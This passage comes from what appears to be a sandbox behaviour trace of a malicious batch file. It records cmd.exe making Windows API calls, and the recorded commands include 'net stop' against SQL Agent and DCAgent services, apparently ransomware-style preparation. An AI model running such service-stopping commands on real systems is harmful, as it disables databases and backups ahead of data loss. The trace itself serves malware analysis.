(lpRootPathName="C:\\") returned 0x3 [0048.181] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0048.181] GetLastError () returned 0x2 [0048.181] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0048.182] GetLastError () returned 0x2 [0048.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0048.182] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0048.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0048.182] GetLastError () returned 0x2 [0048.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0048.182] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0048.182] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.182] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0048.182] SetErrorMode (uMode=0x0) returned 0x1 [0048.182] GetProcessHeap () returned 0x3e0000 [0048.183] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0048.183] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0048.183] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0048.183] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0048.183] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0048.183] GetProcessHeap () returned 0x3e0000 [0048.183] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0048.183] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.183] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0048.183] GetLastError () returned 0x2 [0048.183] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0048.183] GetLastError () returned 0x2 [0048.183] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.184] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0048.184] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0048.184] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0048.184] GetLastError () returned 0x2 [0048.184] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0048.184] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0048.184] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.184] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0048.184] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0048.184] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0048.184] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0048.184] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$TPS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$TPS /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8d0, dwThreadId=0x974)) returned 1 [0048.188] CloseHandle (hObject=0x74) returned 1 [0048.188] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.188] GetProcessHeap () returned 0x3e0000 [0048.188] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0048.188] GetEnvironmentStringsW () returned 0x3f8408* [0048.188] GetProcessHeap () returned 0x3e0000 [0048.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0048.188] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0048.188] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0049.772] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0049.772] CloseHandle (hObject=0x78) returned 1 [0049.772] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0049.772] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0049.772] GetProcessHeap () returned 0x3e0000 [0049.772] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.772] GetEnvironmentStringsW () returned 0x3f8408* [0049.772] GetProcessHeap () returned 0x3e0000 [0049.772] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.772] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.773] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0049.773] GetProcessHeap () returned 0x3e0000 [0049.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0049.773] GetEnvironmentStringsW () returned 0x3f8408* [0049.773] GetProcessHeap () returned 0x3e0000 [0049.773] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0049.773] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0049.773] GetProcessHeap () returned 0x3e0000 [0049.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0049.773] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0049.773] _get_osfhandle (_FileHandle=1) returned 0x264 [0049.773] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0049.773] _get_osfhandle (_FileHandle=1) returned 0x264 [0049.773] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0049.773] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0049.773] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0049.773] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0049.773] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0049.774] SetConsoleInputExeNameW () returned 0x1 [0049.774] GetConsoleOutputCP () returned 0x1b5 [0049.774] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0049.774] SetThreadUILanguage (LangId=0x0) returned 0x409 [0049.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0049.774] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0049.774] _get_osfhandle (_FileHandle=3) returned 0x78 [0049.774] SetFilePointer (in: hFile=0x78, lDistanceToMove=2250, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ca [0049.774] GetProcessHeap () returned 0x3e0000 [0049.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0049.774] GetProcessHeap () returned 0x3e0000 [0049.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0049.774] GetProcessHeap () returned 0x3e0000 [0049.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0049.775] GetProcessHeap () returned 0x3e0000 [0049.775] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0049.775] _get_osfhandle (_FileHandle=3) returned 0x78 [0049.775] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ca [0049.775] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xff7, lpOverlapped=0x0) returned 1 [0049.775] SetFilePointer (in: hFile=0x78, lDistanceToMove=2271, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8df [0049.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop DCAgent /y\r\n /y\r\nrvice /y\r\nMENT /y\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 21 [0049.775] _get_osfhandle (_FileHandle=3) returned 0x78 [0049.775] GetFileType (hFile=0x78) returned 0x1 [0049.775] _get_osfhandle (_FileHandle=3) returned 0x78 [0049.776] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8df [0049.776] GetProcessHeap () returned 0x3e0000 [0049.776] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0049.776] GetProcessHeap () returned 0x3e0000 [0049.776] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0049.776] _tell (_FileHandle=3) returned 2271 [0049.776] _close (_FileHandle=3) returned 0 [0049.776] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0049.776] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0049.776] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0049.776] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0049.776] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0049.776] _wcsicmp (_String1="net", _String2="CD") returned 11 [0049.777] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0049.777] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0049.777] _wcsicmp (_String1="net", _String2="REN") returned -4 [0049.777] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0049.777] _wcsicmp (_String1="net", _String2="SET") returned -5 [0049.777] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0049.777] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0049.777] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0049.777] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0049.777] _wcsicmp (_String1="net", _String2="MD") returned 1 [0049.777] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0049.777] _wcsicmp (_String1="net", _String2="RD") returned -4 [0049.777] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0049.777] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0049.777] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0049.777] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0049.777] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0049.777] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0049.777] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0049.777] _wcsicmp (_String1="net", _String2="VER") returned -8 [0049.777] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0049.777] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0049.777] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0049.777] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0049.777] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0049.777] _wcsicmp (_String1="net", _String2="START") returned -5 [0049.777] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0049.777] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0049.777] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0049.777] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0049.777] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0049.777] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0049.777] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0049.777] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0049.777] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0049.777] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0049.778] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0049.778] SetErrorMode (uMode=0x0) returned 0x1 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0049.778] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0049.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0049.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0049.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0049.778] GetProcessHeap () returned 0x3e0000 [0049.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0049.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.778] GetLastError () returned 0x2 [0049.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.779] GetLastError () returned 0x2 [0049.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0049.779] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0049.779] GetLastError () returned 0x2 [0049.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0049.779] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0049.779] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0049.780] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0049.780] SetErrorMode (uMode=0x0) returned 0x1 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0049.780] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0049.780] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0049.780] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0049.780] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0049.780] GetProcessHeap () returned 0x3e0000 [0049.780] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0049.780] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.780] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.780] GetLastError () returned 0x2 [0049.780] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.781] GetLastError () returned 0x2 [0049.781] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0049.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0049.781] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0049.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0049.781] GetLastError () returned 0x2 [0049.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0049.781] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0049.781] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0049.781] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0049.781] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0049.781] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0049.781] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0049.782] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop DCAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop DCAgent /y", dwX=0x0, 